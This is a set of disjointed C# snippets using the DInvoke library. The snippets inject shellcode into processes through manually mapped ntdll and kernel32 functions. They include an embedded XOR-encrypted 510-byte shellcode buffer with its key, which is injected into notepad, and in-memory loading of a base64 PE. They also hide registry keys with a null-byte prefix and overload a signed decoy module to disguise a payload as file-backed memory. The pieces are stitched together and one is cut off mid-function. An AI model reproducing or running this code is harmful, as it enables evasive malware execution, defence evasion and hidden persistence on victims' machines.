public static void Inject(byte[] shellcode) { DInvoke.Data.PE.PE_MANUAL_MAP module = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\windows\system32\ntdll.dll"); IntPtr baseAddress = IntPtr.Zero; var lpValue = Marshal.AllocHGlobal(IntPtr.Size); Marshal.WriteIntPtr(lpValue, new IntPtr((long)shellcode.Length)); object[] allocateMemory = { (IntPtr)(-1), baseAddress, IntPtr.Zero, lpValue, (uint)(0x00002000 | 0x00001000), (uint)0x40 }; Generic.CallMappedDLLModuleExport(module.PEINFO, module.ModuleBase, "NtAllocateVirtualMemory", typeof(Native.DELEGATES.NtAllocateVirtualMemory), allocateMemory, false); if ((IntPtr)allocateMemory[1] == IntPtr.Zero) { return; } baseAddress = (IntPtr)allocateMemory[1]; IntPtr buffer = Marshal.AllocHGlobal(shellcode.Length); Marshal.Copy(shellcode, 0, buffer, shellcode.Length); uint bytesWritten = 0; object[] writeMemory = { (IntPtr)(-1), baseAddress, buffer, (uint)shellcode.Length, bytesWritten }; Generic.CallMappedDLLModuleExport(module.PEINFO, module.ModuleBase, "NtWriteVirtualMemory", typeof(Native.DELEGATES.NtWriteVirtualMemory), writeMemory, false); IntPtr hthread = IntPtr.Zero; object[] createThread = { hthread, DInvoke.Data.Win32.WinNT.ACCESS_MASK.GENERIC_ALL, IntPtr.Zero, (IntPtr)(-1), baseAddress, IntPtr.Zero, false, 0,0, 0, IntPtr.Zero }; Generic.CallMappedDLLModuleExport(module.PEINFO, module.ModuleBase, "NtCreateThreadEx", typeof(Native.DELEGATES.NtCreateThreadEx), createThread, false); }
static void Main() { string peAsString = "BASE64EncodedBinary"; byte[] unpacked = System.Convert.FromBase64String(peAsString); DInvoke.Data.PE.PE_MANUAL_MAP mapPE = DInvoke.ManualMap.Map.MapModuleToMemory(unpacked); DInvoke.DynamicInvoke.Generic.CallMappedPEModule(mapPE.PEINFO, mapPE.ModuleBase); Console.ReadLine(); }
public void Execute() { banner(); byte[] buf = new byte[510] { 0x91, 0x25, 0xe4, 0x85, 0x84, 0x8d, 0xbf, 0x6d, 0x6d, 0x67, 0x20, 0x25, 0x24, 0x23, 0x3f, 0x25, 0x56, 0xb3, 0x25, 0x33, 0x16, 0x25, 0xe6, 0x35, 0x01, 0x3c, 0xee, 0x21, 0x75, 0x25, 0xec, 0x33, 0x54, 0x2d, 0xf8, 0x1f, 0x3d, 0x2a, 0x50, 0xbd, 0x2d, 0x7c, 0xda, 0x27, 0x2d, 0x29, 0x45, 0xa5, 0xdf, 0x51, 0x0c, 0x1b, 0x63, 0x58, 0x45, 0x32, 0xac, 0xa4, 0x6a, 0x20, 0x75, 0xa4, 0x91, 0x80, 0x3f, 0x26, 0x30, 0x3c, 0xee, 0x21, 0x4d, 0xe6, 0x25, 0x5d, 0x3c, 0x64, 0xa3, 0x0b, 0xec, 0x1f, 0x79, 0x7f, 0x67, 0x7c, 0xe8, 0x1f, 0x67, 0x61, 0x74, 0xee, 0xf3, 0xe5, 0x6d, 0x67, 0x61, 0x3c, 0xe0, 0xb3, 0x19, 0x0a, 0x2f, 0x60, 0xa4, 0x35, 0xf8, 0x25, 0x75, 0x23, 0xea, 0x34, 0x45, 0x3a, 0x6c, 0xbd, 0x84, 0x37, 0x39, 0x54, 0xba, 0x25, 0x92, 0xae, 0x20, 0xff, 0x51, 0xfb, 0x25, 0x6c, 0xb1, 0x29, 0x45, 0xa5, 0x32, 0xac, 0xa4, 0x6a, 0xcd, 0x35, 0x64, 0xb2, 0x55, 0x8d, 0x12, 0x90, 0x38, 0x66, 0x3f, 0x49, 0x65, 0x22, 0x58, 0xa5, 0x10, 0xab, 0x35, 0x29, 0xec, 0x21, 0x50, 0x2c, 0x72, 0xbd, 0x0b, 0x26, 0xea, 0x78, 0x2d, 0x37, 0xe6, 0x2d, 0x7b, 0x28, 0x75, 0xb5, 0x32, 0xe6, 0x69, 0xef, 0x20, 0x2c, 0x2d, 0x72, 0xbd, 0x2c, 0x3f, 0x3f, 0x2d, 0x3f, 0x32, 0x35, 0x2c, 0x3e, 0x20, 0x2e, 0x2d, 0xf0, 0x81, 0x4d, 0x26, 0x33, 0x8b, 0x85, 0x2b, 0x2c, 0x34, 0x3d, 0x29, 0xff, 0x77, 0x9a, 0x26, 0x92, 0x98, 0x9e, 0x29, 0x2c, 0xcd, 0x1a, 0x1e, 0x55, 0x3e, 0x47, 0x57, 0x73, 0x6d, 0x2c, 0x31, 0x28, 0xfd, 0x83, 0x3b, 0xec, 0x81, 0xc7, 0x60, 0x74, 0x65, 0x3a, 0xe4, 0x88, 0x2e, 0xdd, 0x76, 0x65, 0x72, 0xd6, 0xad, 0xcf, 0x51, 0x1b, 0x24, 0x27, 0x24, 0xe4, 0x83, 0x2d, 0xfd, 0x94, 0x32, 0xd7, 0x21, 0x10, 0x47, 0x73, 0x9a, 0xa6, 0x21, 0xe4, 0x8d, 0x09, 0x75, 0x64, 0x73, 0x6d, 0x34, 0x26, 0xdb, 0x5d, 0xe5, 0x18, 0x6d, 0x92, 0xb2, 0x0b, 0x7e, 0x24, 0x2d, 0x3d, 0x3d, 0x2a, 0x50, 0xbd, 0x28, 0x42, 0xad, 0x25, 0x98, 0xa1, 0x3c, 0xec, 0xb1, 0x25, 0x92, 0xa7, 0x29, 0xfd, 0xa4, 0x32, 0xd7, 0x87, 0x68, 0xbe, 0x94, 0x9a, 0xa6, 0x25, 0xe4, 0xa0, 0x0b, 0x64, 0x24, 0x2b, 0x21, 0xe4, 0x85, 0x29, 0xfd, 0x9c, 0x32, 0xd7, 0xf4, 0xc2, 0x15, 0x15, 0x9a, 0xa6, 0xe8, 0xad, 0x13, 0x6b, 0x3d, 0x9a, 0xbd, 0x18, 0x88, 0x8f, 0xf2, 0x74, 0x65, 0x73, 0x25, 0xee, 0x8b, 0x71, 0x3c, 0xec, 0x91, 0x20, 0x5c, 0xae, 0x0b, 0x70, 0x24, 0x2b, 0x25, 0xe4, 0x9e, 0x20, 0xce, 0x67, 0xaa, 0xa5, 0x32, 0x98, 0xb4, 0xf7, 0x9d, 0x73, 0x13, 0x38, 0x2f, 0xe2, 0xb0, 0x45, 0x2d, 0xe4, 0x9b, 0x0d, 0x21, 0x35, 0x3c, 0x1b, 0x6d, 0x7d, 0x67, 0x61, 0x35, 0x3d, 0x3b, 0xe4, 0x9f, 0x2f, 0x50, 0xbd, 0x24, 0xc9, 0x35, 0xc9, 0x34, 0x84, 0x8b, 0xb0, 0x3b, 0xe4, 0xae, 0x2e, 0xe8, 0xb3, 0x28, 0x42, 0xa4, 0x24, 0xee, 0x91, 0x3c, 0xec, 0xa9, 0x25, 0xe4, 0x9e, 0x20, 0xce, 0x67, 0xaa, 0xa5, 0x32, 0x98, 0xb4, 0xf7, 0x9d, 0x73, 0x10, 0x45, 0x3f, 0x20, 0x23, 0x3c, 0x1b, 0x6d, 0x2d, 0x67, 0x61, 0x35, 0x3d, 0x19, 0x6d, 0x37, 0x26, 0xdb, 0x7f, 0x4a, 0x7c, 0x5d, 0x92, 0xb2, 0x36, 0x2d, 0x24, 0xc9, 0x18, 0x03, 0x2a, 0x00, 0x8b, 0xb0, 0x3a, 0x92, 0xa3, 0x8e, 0x5d, 0x8b, 0x9a, 0x8c, 0x25, 0x6c, 0xa4, 0x29, 0x5d, 0xa3, 0x3b, 0xe8, 0x9b, 0x12, 0xd5, 0x35, 0x9a, 0x94, 0x35, 0x07, 0x67, 0x38, 0x3d, 0xa2, 0xb1, 0x9d, 0xd8, 0xc5, 0x37, 0x8b, 0xb0 }; string key = "mmgatest"; byte[] decryptedBuf = xorKey(buf, buf.Length, Encoding.ASCII.GetBytes(key), key.Length); byte[] sc = decryptedBuf; var process = Process.Start("C:\\Windows\\System32\\notepad.exe"); var pid = (uint)process.Id; // 0. Manual Mapping of kernel32.dll + debugging messages DInvoke.Data.PE.PE_MANUAL_MAP kernelModule = DInvoke.ManualMap.Map.MapModuleToMemory("C:\\Windows\\System32\\kernel32.dll"); Console.WriteLine("[>] Module Base Addr - 0x{0}", kernelModule.ModuleBase.ToString("x2")); // 0. Use me for module overloading! //DInvoke.Data.PE.PE_MANUAL_MAP kernelModule = DInvoke.ManualMap.Overload.OverloadModule("C:\\Windows\\System32\\kernel32.dll"); //Console.WriteLine("[>] Using decoy module: " + kernelModule.DecoyModule); //Console.WriteLine("[>] Decoy module Addr: 0x" + kernelModule.ModuleBase.ToString("x2")); //Console.ReadLine(); object[] openProcessParameters = { DInvoke.Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS, false, pid }; var hProc = (IntPtr)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(kernelModule.PEINFO, kernelModule.ModuleBase, "OpenProcess", typeof(DInvoke.DynamicInvoke.Win32.Delegates.OpenProcess), openProcessParameters, false); Console.WriteLine("[>] Process handle: " + string.Format("0x{0:X}", hProc.ToInt64()) + "\n"); Console.WriteLine("[+] VirtualAllocEx - Allocating memory to process"); object[] vAllocParameters = { hProc, IntPtr.Zero, (uint)sc.Length, 0x1000 | 0x2000, 0x04 }; var allocResult = (IntPtr)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(kernelModule.PEINFO, kernelModule.ModuleBase, "VirtualAllocEx", typeof(DELEGATES.VirtualAllocEx), vAllocParameters); Console.WriteLine("[+] WriteProcessMemory - Moving shellcode to calculator"); object[] wProcMemoryParameters = { hProc, allocResult, sc, sc.Length, IntPtr.Zero }; var wProcMemoryResult = (bool)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(kernelModule.PEINFO, kernelModule.ModuleBase, "WriteProcessMemory", typeof(DELEGATES.WriteProcessMemory), wProcMemoryParameters); if (wProcMemoryResult) { Console.WriteLine("[+] Shellcode written in memory of notepad process: 0x{0}", allocResult.ToInt64().ToString("x2")); } Console.WriteLine("[+] VirtualProtectEx - Changing memory region to READ/EXECUTE permission"); uint oldProtect = 0; object[] vProctectExParameters = { hProc, allocResult, (uint)sc.Length, (uint)0x20, oldProtect }; var vProtectExResult = (bool)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(kernelModule.PEINFO, kernelModule.ModuleBase, "VirtualProtectEx", typeof(DELEGATES.VirtualProtectEx), vProctectExParameters); Console.WriteLine("[+] CreateRemoteThread - Starting thread on calculator"); object[] cRemoteThreadParameters = { hProc, IntPtr.Zero, (UInt32)0, allocResult, IntPtr.Zero, (UInt32)0, IntPtr.Zero }; var cRemoteThreadResult = (IntPtr)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(kernelModule.PEINFO, kernelModule.ModuleBase, "CreateRemoteThread", typeof(DELEGATES.CreateRemoteThread), cRemoteThreadParameters); Console.WriteLine("\n" + "Press Enter to shut me down!"); Console.ReadLine(); }
static void InjectIntoProcessManualMapping(IntPtr processHandle, byte[] blob) { uint status = 1; IntPtr pHandle = processHandle; IntPtr memAlloc = IntPtr.Zero; IntPtr zeroBits = IntPtr.Zero; IntPtr size = (IntPtr)blob.Length; IntPtr pThread = IntPtr.Zero; IntPtr buffer = Marshal.AllocHGlobal(blob.Length); uint bytesWritten = 0; uint oldProtect = 0; Marshal.Copy(blob, 0, buffer, blob.Length); DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP(); mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll"); Console.WriteLine(String.Format("Please check the memory of this process in process hacker under the address: 0x{0:x} to find the manually mapped ntdll.dll", mappedDLL.ModuleBase.ToInt64())); Console.WriteLine("Hit a key to alloc memory"); Console.ReadKey(); object[] allocateVirtualMemoryParams = { pHandle, memAlloc, zeroBits, size, DInvoke.Data.Win32.Kernel32.MEM_COMMIT | DInvoke.Data.Win32.Kernel32.MEM_RESERVE, (uint)0x04 }; status = (uint)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(mappedDLL.PEINFO, mappedDLL.ModuleBase, "NtAllocateVirtualMemory", typeof(Native.DELEGATES.NtAllocateVirtualMemory), allocateVirtualMemoryParams, false); memAlloc = (IntPtr)allocateVirtualMemoryParams[1]; size = (IntPtr)allocateVirtualMemoryParams[3]; Console.WriteLine("Hit a key to write memory"); Console.ReadKey(); object[] writeVirtualMemoryParams = { pHandle, memAlloc, buffer, (uint)blob.Length, bytesWritten }; status = (uint)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(mappedDLL.PEINFO, mappedDLL.ModuleBase, "NtWriteVirtualMemory", typeof(Native.DELEGATES.NtWriteVirtualMemory), writeVirtualMemoryParams, false); bytesWritten = (uint)writeVirtualMemoryParams[4]; object[] protectVirtualMemoryParams = { pHandle, memAlloc, size, (uint)0x20, oldProtect }; status = (uint)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(mappedDLL.PEINFO, mappedDLL.ModuleBase, "NtProtectVirtualMemory", typeof(Native.DELEGATES.NtProtectVirtualMemory), protectVirtualMemoryParams, false); memAlloc = (IntPtr)protectVirtualMemoryParams[1]; size = (IntPtr)protectVirtualMemoryParams[2]; oldProtect = (uint)protectVirtualMemoryParams[4]; Console.WriteLine("Hit a key to create the thread and launch our shellcode!"); Console.ReadKey(); object[] createThreadParams = { pThread, DInvoke.Data.Win32.WinNT.ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, pHandle, memAlloc, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero }; status = (uint)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(mappedDLL.PEINFO, mappedDLL.ModuleBase, "NtCreateThreadEx", typeof(Native.DELEGATES.NtCreateThreadEx), createThreadParams, false); pThread = (IntPtr)createThreadParams[0]; }
public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false) { DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP(); mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll"); try { if (hive == "HKLM") { hive = @"\Registry\Machine"; } else if (hive == "HKCU") { String sid = WindowsIdentity.GetCurrent().User.ToString(); hive = @"\Registry\User\" + sid; } else { throw new Exception("Hive needs to be either HKLM or HKCU"); } if (hiddenKey) { keyName = "\0" + keyName; } String regKey = hive + subKey; IntPtr keyHandle = IntPtr.Zero; STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES(); DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING(); string SID = WindowsIdentity.GetCurrent().User.ToString(); DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey); IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey)); Marshal.StructureToPtr(UC_RegKey, oaObjectName, true); oa.Length = Marshal.SizeOf(oa); oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE; oa.objectName = oaObjectName; oa.SecurityDescriptor = IntPtr.Zero; oa.SecurityQualityOfService = IntPtr.Zero; DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS(); ref IntPtr rkeyHandle = ref keyHandle; STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS; ref STRUCTS.OBJECT_ATTRIBUTES roa = ref oa;
/// <summary> /// Load a signed decoy module into memory creating legitimate file-backed memory sections within the process. Afterwards overload that /// module by manually mapping a payload in it's place causing the payload to execute from what appears to be file-backed memory. /// </summary> /// <author>The Wover (@TheRealWover), Ruben Boonen (@FuzzySec)</author> /// <param name="Payload">Full byte array for the payload module.</param> /// <param name="DecoyModulePath">Optional, full path the decoy module to overload in memory.</param> /// <returns>PE.PE_MANUAL_MAP</returns> public static Data.PE.PE_MANUAL_MAP OverloadModule(byte[] Payload, string DecoyModulePath = null, bool LegitSigned = true) { // Did we get a DecoyModule? if (!string.IsNullOrEmpty(DecoyModulePath)) { if (!File.Exists(DecoyModulePath)) { throw new InvalidOperationException("Decoy filepath not found."); } byte[] DecoyFileBytes = File.ReadAllBytes(DecoyModulePath); if (DecoyFileBytes.Length < Payload.Length) { throw new InvalidOperationException("Decoy module is too small to host the payload."); } } else { DecoyModulePath = FindDecoyModule(Payload.Length); if (string.IsNullOrEmpty(DecoyModulePath)) { throw new InvalidOperationException("Failed to find suitable decoy module."); } } // Map decoy from disk Data.PE.PE_MANUAL_MAP DecoyMetaData = Map.MapModuleFromDiskToSection(DecoyModulePath); IntPtr RegionSize = DecoyMetaData.PEINFO.Is32Bit ? (IntPtr)DecoyMetaData.PEINFO.OptHeader32.SizeOfImage : (IntPtr)DecoyMetaData.PEINFO.OptHeader64.SizeOfImage; // Change permissions to RW DynamicInvoke.Native.NtProtectVirtualMemory((IntPtr)(-1), ref DecoyMetaData.ModuleBase, ref RegionSize, Data.Win32.WinNT.PAGE_READWRITE); // Zero out memory DynamicInvoke.Native.RtlZeroMemory(DecoyMetaData.ModuleBase, (int)RegionSize); // Overload module in memory Data.PE.PE_MANUAL_MAP OverloadedModuleMetaData = Map.MapModuleToMemory(Payload, DecoyMetaData.ModuleBase); OverloadedModuleMetaData.DecoyModule = DecoyModulePath; return(OverloadedModuleMetaData); }